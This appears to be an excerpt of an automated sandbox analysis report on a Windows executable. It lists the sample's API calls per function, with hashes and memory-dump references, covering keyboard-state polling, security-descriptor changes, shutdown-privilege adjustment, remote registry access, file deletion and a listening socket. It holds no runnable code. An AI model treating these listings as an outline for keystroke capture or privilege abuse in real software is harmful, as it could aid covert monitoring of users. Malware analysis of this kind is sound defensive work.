                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                                      • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                                                                                                                                                                                      • API String ID: 2102423945-2023335898
                                                                                                                                                                                                                                                      • Opcode ID: b96144db89b437c17a6030daa4fa45b745c235430099c5bc21b9953885e60f6a
                                                                                                                                                                                                                                                      • Instruction ID: 696de0d80ded7e5cd42c159e2a533f823d9d322c54185d31ac4202d5aa7d4dd4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b96144db89b437c17a6030daa4fa45b745c235430099c5bc21b9953885e60f6a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE82BE71D04219CBCB24CF98CA80BEDBBB1BF44324F24916AD859BB341E7759D86DB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00F109DF
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F109EF
                                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F109FB
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F10A59
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F10A71
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F10A83
                                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F10A98
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F10AAC
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F10ADE
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F10AFF
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F10B0B
                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F10B4A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                      • API String ID: 3566783562-438819550
                                                                                                                                                                                                                                                      • Opcode ID: 0d707e15511cc1db2bc844cc33edf3e0be190c1ef4e3a34617ee1d71512ca476
                                                                                                                                                                                                                                                      • Instruction ID: d254494978f188f786b7bf073edf36b33b692b721a9041af541aeb524ff8cb04
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d707e15511cc1db2bc844cc33edf3e0be190c1ef4e3a34617ee1d71512ca476
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B6147725083059FC710EF60C844EAEB3E8FF89314F04492EE989D7252DB75E985DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EFABD7
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetLastError.KERNEL32(?,00EFA69F,?,?,?), ref: 00EFABE1
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EFA69F,?,?,?), ref: 00EFABF0
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: HeapAlloc.KERNEL32(00000000,?,00EFA69F,?,?,?), ref: 00EFABF7
                                                                                                                                                                                                                                                        • Part of subcall function 00EFABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAC56: GetProcessHeap.KERNEL32(00000008,00EFA6B5,00000000,00000000,?,00EFA6B5,?), ref: 00EFAC62
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAC56: HeapAlloc.KERNEL32(00000000,?,00EFA6B5,?), ref: 00EFAC69
                                                                                                                                                                                                                                                        • Part of subcall function 00EFAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EFA6B5,?), ref: 00EFAC7A
                                                                                                                                                                                                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EFA6D0
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EFA6E5
                                                                                                                                                                                                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EFA704
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EFA715
                                                                                                                                                                                                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00EFA752
                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EFA76E
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?), ref: 00EFA78B
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EFA79A
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00EFA7A1
                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EFA7C2
                                                                                                                                                                                                                                                      • CopySid.ADVAPI32(00000000), ref: 00EFA7C9
                                                                                                                                                                                                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EFA7FA
                                                                                                                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EFA820
                                                                                                                                                                                                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EFA834
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3996160137-0
                                                                                                                                                                                                                                                      • Opcode ID: e57a94a0860a5455c54d4b43bd471b6766b6a8d17e67f7faf83f9df1553fbf7d
                                                                                                                                                                                                                                                      • Instruction ID: d81efb71e379491ce57c3ac22d718058f9f30d50f855287d3f570698a27f8f8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e57a94a0860a5455c54d4b43bd471b6766b6a8d17e67f7faf83f9df1553fbf7d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5514BB590020DABDF14DF94DC48EFEBBB9FF05304F088129EA15AB290D7749A05DB61
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                                                                                                                                      • API String ID: 0-4052911093
                                                                                                                                                                                                                                                      • Opcode ID: 81bad41a8f606cd410cce30b84c6030753f513dd1775f53f80c394906dd9ad9d
                                                                                                                                                                                                                                                      • Instruction ID: eeec464c0f4962689e8edbe2097f41c47ddae086d43e73216af5e3ac19b2673a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81bad41a8f606cd410cce30b84c6030753f513dd1775f53f80c394906dd9ad9d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60728271E04219DBDB18CF58C980BAEBBB5BF44310F54816AE855FB281DB719E81EF90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F06EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F05FA6,?), ref: 00F06ED8
                                                                                                                                                                                                                                                        • Part of subcall function 00F072CB: GetFileAttributesW.KERNEL32(?,00F06019), ref: 00F072CC
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F06441
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F0645F
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F06474
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F064A3
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F064B8
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F064CA
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00F064DA
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F064EB
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00F06506
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                      • API String ID: 2643075503-1173974218
                                                                                                                                                                                                                                                      • Opcode ID: 1370fb4b1179e7c35704923c5b4ee633e34617626576d2b1808312ae2e6d7816
                                                                                                                                                                                                                                                      • Instruction ID: 4ae2fb5eb846c2bb073f826f9a8d6e65f65a8d593dfc72ee151214ec262c6582
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1370fb4b1179e7c35704923c5b4ee633e34617626576d2b1808312ae2e6d7816
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 983184B2408388AAC721DBA48C85ADFB7DCAF96310F44091EF6D8C3181EA35D549A767
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F2328E
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F2332D
                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F233C5
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00F23604
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F23611
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1240663315-0
                                                                                                                                                                                                                                                      • Opcode ID: 1d4a8633058a62e6d7a69d8c4bbd75c6847119258f907913bf66d5a5ac23ae9d
                                                                                                                                                                                                                                                      • Instruction ID: 4404b6ae7b03ee1a7222c195c85598e8ebabf9249e31ae48910618e5e1f703f1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d4a8633058a62e6d7a69d8c4bbd75c6847119258f907913bf66d5a5ac23ae9d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EE17D75604210AFCB14DF28D995E2ABBE8FF89310F04896DF44ADB2A1CB35ED05DB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F02B5F
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00F02BE0
                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00F02BFB
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00F02C15
                                                                                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00F02C2A
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00F02C42
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00F02C54
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00F02C6C
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00F02C7E
                                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00F02C96
                                                                                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00F02CA8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                                                                                      • Opcode ID: 83e2d2fbc081e9756c920d712a50a4bb2d4a6da83f4b9adca7c3f22cb5282c39
                                                                                                                                                                                                                                                      • Instruction ID: 41cc47e63bc7c97d54d281766e1178d11715f241c35e7f5936a2b8d1ce6363b6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83e2d2fbc081e9756c920d712a50a4bb2d4a6da83f4b9adca7c3f22cb5282c39
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A41D574D047C96DFFB59B60890C3A9BEA06B22334F08C059D9C6566C2DB9499C4F7B2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                                                                                                      • Opcode ID: 9f2a4fc0ef751c92fb6805f804ebf0cf391bf2b32586a506a1feed114fde9ee8
                                                                                                                                                                                                                                                      • Instruction ID: f3475c1f95a9dc2d983f964ec0933724848222f5f7dc553635ea45aab7c84905
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f2a4fc0ef751c92fb6805f804ebf0cf391bf2b32586a506a1feed114fde9ee8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D721B035300114AFDB01AF64ED49B6DB7E8FF65721F01801AF90ADB2A1CB74ED41AB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EF9ABF: CLSIDFromProgID.OLE32 ref: 00EF9ADC
                                                                                                                                                                                                                                                        • Part of subcall function 00EF9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00EF9AF7
                                                                                                                                                                                                                                                        • Part of subcall function 00EF9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00EF9B05
                                                                                                                                                                                                                                                        • Part of subcall function 00EF9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EF9B15
                                                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F1C235
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F1C242
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F1C360
                                                                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00F1C38C
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00F1C397
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • NULL Pointer assignment, xrefs: 00F1C3E5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                                                                                                                                                      • Opcode ID: 996066497b477eba20d1ac5c75f04f0ec94be6b6521f3108561b4470a30ef1fd
                                                                                                                                                                                                                                                      • Instruction ID: de45489ee90ae7644a8890bd8d349b448fd2ac67dbac4f04f4f5defbcc04146c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 996066497b477eba20d1ac5c75f04f0ec94be6b6521f3108561b4470a30ef1fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76912A71D00218ABDB10DF94DC95EEEBBB9EF04710F20816AF919B7281DB719A45DFA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EFB180
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EFB1AD
                                                                                                                                                                                                                                                        • Part of subcall function 00EFB134: GetLastError.KERNEL32 ref: 00EFB1BA
                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00F07A0F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                      • String ID: $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                      • API String ID: 2234035333-194228
                                                                                                                                                                                                                                                      • Opcode ID: afc75116bb70373336fe824e5285df4778c64548221fc6366e0a40504d5f95d8
                                                                                                                                                                                                                                                      • Instruction ID: 5b248b68d086f5825d02db0283fba0a184cdac0754913209c8d0fc3e4f857ab4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afc75116bb70373336fe824e5285df4778c64548221fc6366e0a40504d5f95d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F01F772F583156AF7287668DC5ABBF33589B00750F2448A4FD43E20E2D9A8BF00B1B1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00F18CA8
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18CB7
                                                                                                                                                                                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00F18CD3
                                                                                                                                                                                                                                                      • listen.WSOCK32(00000000,00000005), ref: 00F18CE2
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18CFC
                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00F18D10
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
